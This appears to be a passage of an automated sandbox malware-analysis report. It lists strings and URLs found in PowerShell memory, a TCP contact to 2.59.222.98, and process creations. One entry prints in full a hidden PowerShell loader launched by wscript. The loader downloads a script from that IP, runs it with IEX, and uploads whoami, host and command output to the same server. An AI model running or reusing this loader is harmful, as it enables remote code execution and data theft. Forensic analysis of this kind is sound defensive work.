Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2786448755.000002A977950000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000008.00000002.2785104957.000002A977746000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb= source: powershell.exe, 00000008.00000002.2785104957.000002A97771B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.2786448755.000002A97799D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbh source: powershell.exe, 00000008.00000002.2786448755.000002A97799D000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.59.222.98 |
Source: powershell.exe, 00000014.00000002.3887745616.0000024A6CC1C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.9 |
Source: powershell.exe, 00000014.00000002.3885321197.0000024A6AB59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3887745616.0000024A6CBF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, Layouts.vbs.1.dr |
String found in binary or memory: http://2.59.222.98:28402/page114 |
Source: powershell.exe, 00000014.00000002.3866941302.0000024A004B6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:28402/page114Bytestf8.GetBytesesX |
Source: powershell.exe, 00000014.00000002.3866941302.0000024A004B6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:28402/page114X |
Source: powershell.exe, 00000008.00000002.2746847374.000002A901676000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2746847374.000002A9015F4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820 |
Source: powershell.exe, 00000008.00000002.2746847374.000002A90167E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820( |
Source: powershell.exe, 00000014.00000002.3866941302.0000024A004B6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/SZqGnpR |
Source: powershell.exe, 00000008.00000002.2746847374.000002A901946000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/SZqGnpRL |
Source: powershell.exe, 00000014.00000002.3885321197.0000024A6AB59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3887745616.0000024A6CBF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, Layouts.vbs.1.dr |
String found in binary or memory: http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt |
Source: powershell.exe, 00000008.00000002.2786374979.000002A9777B0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://2.59.222.98:43820/szqgnprlfqiycdkb/page114/upgrade.txt |
Source: powershell.exe, 00000014.00000002.3887373822.0000024A6AD65000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: svchost.exe, 00000007.00000002.3103390706.0000028C55600000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab |
Source: svchost.exe, 00000007.00000003.1474568088.0000028C55800000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000001.00000002.1443251156.0000000006367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2778411682.000002A9101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2746847374.000002A901A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000008.00000002.2746847374.000002A90022D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1447977927.0000000008AE4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.opez |
Source: powershell.exe, 00000001.00000002.1437033919.0000000005301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2746847374.000002A900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A00083000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000008.00000002.2746847374.000002A90022D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000014.00000002.3887373822.0000024A6AD65000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000008.00000002.2746847374.000002A900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A0005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A00049000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000001.00000002.1437033919.0000000005301000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: svchost.exe, 00000007.00000003.1474568088.0000028C5587A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/Prod-C: |
Source: svchost.exe, 00000007.00000003.1474568088.0000028C55800000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C: |
Source: powershell.exe, 00000008.00000002.2746847374.000002A90022D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.2746847374.000002A900C2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3866941302.0000024A0055A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000008.00000002.2785104957.000002A9776E0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://go.microsoft.coyy |
Source: powershell.exe, 00000001.00000002.1443251156.0000000006367000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2778411682.000002A9101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2746847374.000002A901A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2778411682.000002A910072000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/SZqGnpRLFQIycdKb/page114/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page114',$drpy);} |
|
Source: C:\Windows\System32\conhost.exe |
Mutant created: \BaseNamedObjects\Local\SM0:7836:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03 |